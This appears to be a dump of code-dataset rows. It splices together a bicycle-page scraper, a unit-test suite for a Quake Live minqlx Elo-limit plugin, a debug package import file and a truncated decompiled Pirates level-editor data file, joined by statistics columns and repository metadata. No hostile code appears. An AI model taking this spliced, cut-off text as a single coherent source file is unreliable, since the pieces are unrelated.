'https://www.epey.com/bisiklet/umit-2411-rideon.html'}, {'name': 'Ümit 2056 Accrue 2D 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2056-accrue-2d-20.html'}, {'name': 'Ümit 1671 Superbomber 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1671-superbomber-16.html'}, {'name': 'Ümit 2802 Taurus Man 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2802-taurus-man-28.html'}, {'name': 'Ümit 2053 Thunder 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2053-thunder-20.html'}, {'name': 'Ümit 2965 Mirage V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2965-mirage-v.html'}, {'name': 'Gitane Fast Bisiklet', 'link': 'https://www.epey.com/bisiklet/gitane-fast.html'}, {'name': 'Carraro Kifuka 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-kifuka-27-5.html'}]
for i in bicycles:
url = i['link']
try:
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
except:
print("err in "+i['link'])
else:
print("Downloaded "+i['name']+" ", end="\r")
fileName = i['name'].replace('/','_')
f = open("./listItems/"+fileName+'.html', 'wb')
f.write(webpage)
f.close
| 906.181818 | 19,356 | 0.688353 | 3,085 | 19,936 | 4.448622 | 0.117018 | 0.158263 | 0.224206 | 0.263772 | 0.660376 | 0.596692 | 0.573739 | 0.554212 | 0.328111 | 0.141504 | 0 | 0.059336 | 0.078551 | 19,936 | 21 | 19,357 | 949.333333 | 0.687643 | 0 | 0 | 0 | 0 | 2.555556 | 0.815601 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
868eb825011495edcc58f16f21e6e75e8ab1abc6
| 22,691 |
py
|
Python
|
src/unittest/python/merciful_elo_limit_tests.py
|
mgaertne/minqlx-plugin-tests
|
10a827fe063c86481560dcc00a8a3ce2ba60861b
|
[
"BSD-3-Clause"
] | 4 |
2017-11-01T04:49:27.000Z
|
2020-08-08T12:11:51.000Z
|
src/unittest/python/merciful_elo_limit_tests.py
|
mgaertne/minqlx-plugin-tests
|
10a827fe063c86481560dcc00a8a3ce2ba60861b
|
[
"BSD-3-Clause"
] | null | null | null |
src/unittest/python/merciful_elo_limit_tests.py
|
mgaertne/minqlx-plugin-tests
|
10a827fe063c86481560dcc00a8a3ce2ba60861b
|
[
"BSD-3-Clause"
] | 1 |
2021-04-26T09:04:36.000Z
|
2021-04-26T09:04:36.000Z
|
from minqlx_plugin_test import *
import logging
import unittest
from mockito import *
from mockito.matchers import *
from hamcrest import *
from redis import Redis
from merciful_elo_limit import *
class MercifulEloLimitTests(unittest.TestCase):
def setUp(self):
setup_plugin()
setup_cvars({
"qlx_mercifulelo_minelo": "800",
"qlx_mercifulelo_applicationgames": "10",
"qlx_mercifulelo_abovegames": "10",
"qlx_mercifulelo_daysbanned": "30",
"qlx_owner": "42"
})
setup_game_in_progress()
self.plugin = merciful_elo_limit()
self.reply_channel = mocked_channel()
self.plugin.database = Redis
self.db = mock(Redis)
self.plugin._db_instance = self.db
when(self.db).__getitem__(any).thenReturn("42")
def tearDown(self):
unstub()
def setup_balance_ratings(self, player_elos):
gametype = None
if len(player_elos) > 0:
gametype = self.plugin.game.type_short
ratings = {}
for player, elo in player_elos:
ratings[player.steam_id] = {gametype: {'elo': elo}}
self.plugin._loaded_plugins["balance"] = mock({'ratings': ratings})
def setup_no_balance_plugin(self):
if "balance" in self.plugin._loaded_plugins:
del self.plugin._loaded_plugins["balance"]
def setup_exception_list(self, players):
mybalance_plugin = mock(Plugin)
mybalance_plugin.exceptions = [player.steam_id for player in players]
self.plugin._loaded_plugins["mybalance"] = mybalance_plugin
def test_handle_map_change_resets_tracked_player_ids(self):
connected_players()
self.setup_balance_ratings([])
self.plugin.tracked_player_sids = [123, 455]
self.plugin.handle_map_change("campgrounds", "ca")
assert_that(self.plugin.tracked_player_sids, is_([]))
def test_handle_map_change_resets_announced_player_ids(self):
connected_players()
self.setup_balance_ratings([])
self.plugin.announced_player_elos = [123, 455]
self.plugin.handle_map_change("campgrounds", "ca")
assert_that(self.plugin.announced_player_elos, is_([]))
def test_handle_map_change_fetches_elos_of_connected_players(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 1200)})
self.plugin.handle_map_change("thunderstruck", "ca")
verify(self.plugin._loaded_plugins["balance"]).add_request(
{player1.steam_id: 'ca', player2.steam_id: 'ca'},
self.plugin.callback_ratings, CHAT_CHANNEL
)
def test_handle_player_connect_fetches_elo_of_connecting_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connecting_player = fake_player(789, "Connecting Player")
connected_players(player1, player2, connecting_player)
self.setup_balance_ratings({(player1, 900), (player2, 1200), (connecting_player, 1542)})
self.plugin.handle_player_connect(connecting_player)
verify(self.plugin._loaded_plugins["balance"]).add_request(
{connecting_player.steam_id: 'ca'},
self.plugin.callback_ratings, CHAT_CHANNEL
)
def test_fetch_elos_of_players_with_no_game_setup(self):
setup_no_game()
self.setup_balance_ratings({})
self.plugin.fetch_elos_of_players([])
verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)
def test_fetch_elos_of_players_with_unsupported_gametype(self):
setup_game_in_progress("unsupported")
self.setup_balance_ratings({})
self.plugin.fetch_elos_of_players([])
verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)
def test_fetch_elos_of_player_with_no_balance_plugin(self):
mocked_logger = mock(spec=logging.Logger)
spy2(minqlx.get_logger)
when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger)
self.setup_no_balance_plugin()
self.plugin.fetch_elos_of_players([])
verify(mocked_logger).warning(matches("Balance plugin not found.*"))
def test_handle_round_countdown_with_no_game(self):
setup_no_game()
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Speccing Player", team="spectator")
connected_players(player1, player2, player3)
self.setup_balance_ratings({})
self.plugin.handle_round_countdown(1)
verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)
def test_handle_round_countdown_fetches_elos_of_players_in_teams(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Speccing Player", team="spectator")
connected_players(player1, player2, player3)
self.setup_balance_ratings({(player1, 900), (player2, 1200), (player3, 1600)})
self.plugin.handle_round_countdown(4)
verify(self.plugin._loaded_plugins["balance"]).add_request(
{player1.steam_id: 'ca', player2.steam_id: 'ca'},
self.plugin.callback_ratings, CHAT_CHANNEL
)
def test_callback_ratings_with_no_game_running(self):
setup_no_game()
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Speccing Player", team="spectator")
connected_players(player1, player2, player3)
self.setup_balance_ratings({})
self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL)
verify(self.db, times=0).get(any)
def test_callback_ratings_with_unsupported_game_type(self):
setup_game_in_progress("unsupported")
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Speccing Player", team="spectator")
connected_players(player1, player2, player3)
self.setup_balance_ratings({})
self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL)
verify(self.db, times=0).get(any)
def test_callback_ratings_warns_low_elo_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
patch(minqlx.next_frame, lambda func: func)
patch(minqlx.thread, lambda func: func)
patch(time.sleep, lambda int: None)
when(self.db).get(any).thenReturn("2")
self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*"))
verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*"))
def test_callback_ratings_announces_information_to_other_players(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
patch(minqlx.next_frame, lambda func: func)
patch(minqlx.thread, lambda func: func)
patch(time.sleep, lambda int: None)
when(self.db).get(any).thenReturn("2")
self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
assert_plugin_sent_to_console(matches("Fake Player2.*is below.*, but has.*8.*application matches left.*"))
def test_callback_ratings_announces_information_to_other_players_just_once_per_connect(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
self.plugin.announced_player_elos = [456]
patch(minqlx.next_frame, lambda func: func)
patch(minqlx.thread, lambda func: func)
patch(time.sleep, lambda int: None)
when(self.db).get(any).thenReturn("2")
self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
assert_plugin_sent_to_console(matches("Player.*is below.*, but has 8 application matches left.*"), times=0)
def test_callback_ratings_makes_exception_for_player_in_exception_list(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Fake Player3", team="red")
connected_players(player1, player2, player3)
self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)})
self.setup_exception_list([player3])
patch(minqlx.next_frame, lambda func: func)
patch(minqlx.thread, lambda func: func)
patch(time.sleep, lambda int: None)
when(self.db).get(any).thenReturn("2")
self.plugin.callback_ratings([player1, player2, player3], minqlx.CHAT_CHANNEL)
verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*"))
verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*"))
verify(player3, times=0).center_print(any)
verify(player3, times=0).tell(any)
def test_callback_ratings_warns_low_elo_player_when_application_games_not_set(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
patch(minqlx.next_frame, lambda func: func)
patch(minqlx.thread, lambda func: func)
patch(time.sleep, lambda int: None)
when(self.db).get(any).thenReturn(None)
self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
verify(player2, times=12).center_print(matches(".*Skill warning.*10.*matches left.*"))
verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*10.*of 10 application matches.*"))
def test_callback_ratings_bans_low_elo_players_that_used_up_their_application_games(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
when(self.db).get(any).thenReturn("11")
spy2(minqlx.COMMANDS.handle_input)
when2(minqlx.COMMANDS.handle_input, any, any, any).thenReturn(None)
patch(minqlx.PlayerInfo, lambda *args: mock(spec=minqlx.PlayerInfo))
patch(minqlx.next_frame, lambda func: func)
when(self.db).delete(any).thenReturn(None)
self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL)
verify(minqlx.COMMANDS).handle_input(any, any, any)
verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))
verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id))
def test_handle_round_start_increases_application_games_for_untracked_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
when(self.db).get(any).thenReturn("3")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(False)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id))
def test_handle_round_start_makes_exception_for_player_in_exception_list(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Fake Player3", team="red")
connected_players(player1, player2, player3)
self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)})
self.setup_exception_list([player3])
when(self.db).get(any).thenReturn("3")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(False)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db).incr("minqlx:players:{}:minelo:freegames".format(player2.steam_id))
verify(self.db, times=0).incr("minqlx:players:{}:minelo:freegames".format(player3.steam_id))
def test_handle_round_start_starts_tracking_for_low_elo_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
when(self.db).get(any).thenReturn("3")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(False)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id))
def test_handle_round_start_resets_above_games_for_low_elo_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
when(self.db).get(any).thenReturn("3")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(True)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))
def test_handle_round_start_increases_above_games_for_application_games_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 801)})
when(self.db).get(any).thenReturn("3")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(True)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))
def test_handle_round_start_increases_above_games_for_application_games_player_with_no_aobve_games_set(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 801)})
when(self.db).get(any).thenReturn("1")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(True)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db).incr("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))
def test_handle_round_start_starts_tracking_of_above_elo_players_for_application_games_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 801)})
when(self.db).get(any).thenReturn("3")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(True)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
assert_that(self.plugin.tracked_player_sids, has_item(player2.steam_id))
def test_handle_round_start_removes_minelo_db_entries_for_above_elo_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({(player1, 900), (player2, 801)})
when(self.db).get(any).thenReturn("11")
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(True)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db).delete("minqlx:players:{}:minelo:freegames".format(player2.steam_id))
verify(self.db).delete("minqlx:players:{}:minelo:abovegames".format(player2.steam_id))
def test_handle_round_start_skips_already_tracked_player(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.plugin.tracked_player_sids.append(player2.steam_id)
self.setup_balance_ratings({(player1, 900), (player2, 799)})
when(self.db).get(any).thenReturn(3)
when(self.db).delete(any).thenReturn(None)
when(self.db).exists(any).thenReturn(False)
when(self.db).incr(any).thenReturn(None)
self.plugin.handle_round_start(1)
verify(self.db, times=0).delete(any)
verify(self.db, times=0).delete(any)
def test_handle_round_start_with_unsupported_gametype(self):
setup_game_in_progress("unsupported")
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
self.setup_balance_ratings({})
self.plugin.handle_round_start(2)
verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any)
def test_handle_round_start_with_no_balance_plugin(self):
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
connected_players(player1, player2)
mocked_logger = mock(spec=logging.Logger)
spy2(minqlx.get_logger)
when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger)
self.setup_no_balance_plugin()
self.plugin.handle_round_start(5)
verify(mocked_logger, atleast=1).warning(matches("Balance plugin not found.*"))
def test_cmd_mercis_shows_currently_connected_merciful_players(self):
player = fake_player(666, "Cmd using Player")
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Fake Player3", team="blue")
connected_players(player, player1, player2, player3)
self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)})
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2")
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3")
when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6")
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None)
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None)
self.plugin.cmd_mercis(player, ["!mercis"], self.reply_channel)
assert_channel_was_replied(self.reply_channel, matches("Fake Player1 \(elo: 801\):.*8.*application matches "
"left,.*6.*matches above.*"))
assert_channel_was_replied(self.reply_channel, matches("Fake Player2 \(elo: 799\):.*7.*application matches "
"left"))
def test_cmd_mercis_replies_to_main_cbannel_instead_of_team_chat(self):
self.addCleanup(self.reset_chat_channel, minqlx.CHAT_CHANNEL)
minqlx.CHAT_CHANNEL = mocked_channel()
player = fake_player(666, "Cmd using Player")
player1 = fake_player(123, "Fake Player1", team="red")
player2 = fake_player(456, "Fake Player2", team="blue")
player3 = fake_player(789, "Fake Player3", team="blue")
connected_players(player, player1, player2, player3)
self.setup_balance_ratings({(player, 1400), (player1, 801), (player2, 799), (player3, 900)})
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player1.steam_id)).thenReturn("2")
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player2.steam_id)).thenReturn("3")
when(self.db).get("minqlx:players:{}:minelo:abovegames".format(player1.steam_id)).thenReturn("6")
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player.steam_id)).thenReturn(None)
when(self.db).get("minqlx:players:{}:minelo:freegames".format(player3.steam_id)).thenReturn(None)
self.plugin.cmd_mercis(player, ["!mercis"], minqlx.BLUE_TEAM_CHAT_CHANNEL)
assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player1 \(elo: 801\):.*8.*application matches "
"left,.*6.*matches above.*"))
assert_channel_was_replied(minqlx.CHAT_CHANNEL, matches("Fake Player2 \(elo: 799\):.*7.*application matches "
"left"))
def reset_chat_channel(self, original_chat_channel):
minqlx.CHAT_CHANNEL = original_chat_channel
def test_cmd_mercis_shows_no_mercis_if_no_player_using_their_application_matches(self):
player = fake_player(666, "Cmd using Player")
connected_players(player)
self.setup_balance_ratings({(player, 1400)})
when(self.db).get(any).thenReturn(None)
self.plugin.cmd_mercis(player, ["!mercis"], minqlx.CHAT_CHANNEL)
assert_plugin_sent_to_console(any, times=0)
| 44.932673 | 117 | 0.677493 | 2,846 | 22,691 | 5.151792 | 0.077301 | 0.029055 | 0.037512 | 0.045492 | 0.860456 | 0.825672 | 0.817556 | 0.799413 | 0.768858 | 0.738371 | 0 | 0.040239 | 0.189547 | 22,691 | 504 | 118 | 45.021825 | 0.757042 | 0 | 0 | 0.670213 | 0 | 0 | 0.122075 | 0.043497 | 0 | 0 | 0 | 0 | 0.029255 | 1 | 0.098404 | false | 0 | 0.021277 | 0 | 0.12234 | 0.010638 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
86bbd227d8b7715b6a7438754f63aeb34b54d300
| 169 |
py
|
Python
|
py/debug/__init__.py
|
segrids/arduino_due
|
f375020b81459eae9b325aa3646ff84efc2853e8
|
[
"MIT"
] | 3 |
2021-08-20T16:03:37.000Z
|
2022-03-23T20:23:30.000Z
|
py/debug/__init__.py
|
segrids/testbench
|
f375020b81459eae9b325aa3646ff84efc2853e8
|
[
"MIT"
] | null | null | null |
py/debug/__init__.py
|
segrids/testbench
|
f375020b81459eae9b325aa3646ff84efc2853e8
|
[
"MIT"
] | null | null | null |
from .swd import SWD
from .ahb import AHB
from .debugger import Debugger, HaltError, NotHaltedError
try:
from .dwarf import ELFDebugger
except ImportError:
pass
| 21.125 | 57 | 0.775148 | 22 | 169 | 5.954545 | 0.590909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177515 | 169 | 7 | 58 | 24.142857 | 0.942446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.714286 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 |
0
| 6 |
86ef419ce9a394c69c1d9d5b8bea2b3d98c02484
| 29,478 |
py
|
Python
|
pirates/leveleditor/worldData/interior_spanish_npc_b.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3 |
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/leveleditor/worldData/interior_spanish_npc_b.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/leveleditor/worldData/interior_spanish_npc_b.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1 |
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.interior_spanish_npc_b
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1153420207.67dzlu01': {'Type': 'Building Interior', 'Name': '', 'Instanced': True, 'Objects': {'1165347933.66kmuller': {'Type': 'Log_Stack', 'DisableCollision': True, 'Hpr': VBase3(139.803, 0.0, 0.0), 'Pos': Point3(2.978, 25.796, 0.048), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Log_stack_a'}}, '1166138034.99kmuller': {'Type': 'Log_Stack', 'DisableCollision': True, 'Hpr': VBase3(179.29, 0.0, 0.0), 'Pos': Point3(9.307, 24.592, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Log_stack_b'}}, '1166138092.34kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(-90.005, 0.0, 0.0), 'Pos': Point3(18.672, 15.355, 0.009), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/cabinet_spanish_low'}}, '1166138151.37kmuller': {'Type': 'Pots', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(18.938, 13.997, 2.735), 'Scale': VBase3(1.464, 1.464, 1.464), 'Visual': {'Model': 'models/props/pot_A'}}, '1166138161.79kmuller': {'Type': 'Pots', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(18.511, 15.482, 3.364), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/pot_B'}}, '1166138390.93kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Holiday': '', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.303, 0.276, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.75, 0.9300000071525574, 1.0, 1.0), 'Model': 'models/props/table_bar_round'}}, '1166138443.79kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(-134.164, 0.0, 0.0), 'Pos': Point3(4.61, -3.84, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bank'}}, '1166138454.85kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(54.358, 0.0, 0.0), 'Pos': Point3(-6.565, 0.327, 0.038), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bar'}}, '1166138510.96kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(162.38, 0.0, 0.0), 'Pos': Point3(-3.36, -6.982, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bank'}}, '1166138524.92kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(80.452, 0.0, 0.0), 'Pos': Point3(5.079, 5.725, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bar'}}, '1166138537.42kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(25.255, 0.0, 0.0), 'Pos': Point3(-1.381, 6.177, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chair_bank'}}, '1166138621.31kmuller': {'Type': 'Jugs_and_Jars', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(0.672, -2.129, 3.008), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bottle_green'}}, '1166138646.6kmuller': {'Type': 'Jugs_and_Jars', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.184, 1.377, 3.061), 'Scale': VBase3(1.429, 1.429, 1.429), 'Visual': {'Model': 'models/props/waterpitcher'}}, '1166138674.59kmuller': {'Type': 'Baskets', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(1.112, 0.235, 2.971), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/basket'}}, '1166138708.48kmuller': {'Type': 'Food', 'DisableCollision': False, 'Holiday': '', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(19.066, 23.998, 3.071), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/sausage'}}, '1166138742.6kmuller': {'Type': 'Food', 'DisableCollision': False, 'Hpr': VBase3(0.0, -4.607, 0.0), 'Pos': Point3(12.569, 24.56, 2.688), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/garlicString'}}, '1166138817.45kmuller': {'Type': 'Bucket', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(17.053, 10.72, 0.006), 'Scale': VBase3(0.665, 0.665, 0.665), 'Visual': {'Model': 'models/props/washtub'}}, '1166138973.9kmuller': {'Type': 'Tools', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(18.741, 7.367, 0.02), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/butter_churn'}}, '1166139009.4kmuller': {'Type': 'Tools', 'DisableCollision': False, 'Hpr': VBase3(-2.549, 12.708, -168.558), 'Pos': Point3(-7.195, -29.635, 4.369), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.5, 0.5, 0.5, 1.0), 'Model': 'models/props/broom'}}, '1166139125.65kmuller': {'Type': 'Furniture - Fancy', 'DisableCollision': True, 'Hpr': VBase3(179.014, 0.0, 0.0), 'Pos': Point3(-16.599, -28.46, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/cabinet_fancy_tall'}}, '1166139259.49kmuller': {'Type': 'Mortar_Pestle', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(19.246, 16.431, 3.391), 'Scale': VBase3(1.0, 1.0, 